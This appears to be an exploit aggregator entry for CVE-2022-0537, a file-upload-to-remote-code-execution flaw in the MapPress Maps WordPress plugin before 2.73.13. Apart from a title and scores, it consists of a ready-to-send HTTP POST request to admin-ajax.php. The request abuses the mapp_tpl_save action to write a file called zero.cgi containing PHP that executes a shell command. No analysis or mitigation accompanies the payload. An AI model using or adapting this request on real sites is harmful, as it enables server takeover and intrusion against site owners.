Exploit for MapPress Maps for WordPress < 2.73.13 - Admin+ File Upload to Remote Code Execution CVE-2022-0537

Name: Exploit for MapPress Maps for WordPress < 2.73.13 - Admin+ File Upload to Remote Code Execution CVE-2022-0537
Rating: 5 (81 reviews)

2022-03-14 | CVSS 6.5

## https://sploitus.com/exploit?id=WPEX-ID:ABFBBA70-5158-4990-98E5-F302361DB367
POST /wp-admin/admin-ajax.php HTTP/1.1
Content-Length: 329
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: http://localhost:8000/wp-admin/admin.php?page=mappress_maps
Accept-Encoding: gzip, deflate
Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: [admin+]

action=mapp_tpl_save&mapdata=%7B%22center%22%3Anull%2C%22height%22%3Anull%2C%22mapid%22%3Anull%2C%22mapTypeId%22%3Anull%2C%22metaKey%22%3Anull%2C%22pois%22%3A%5B%5D%2C%22postid%22%3A0%2C%22search%22%3Anull%2C%22title%22%3Anull%2C%22width%22%3Anull%2C%22zoom%22%3Anull%7D&nonce=9fe04b45b4&name=zero.cgi&content=<?php+echo(`ls`);?>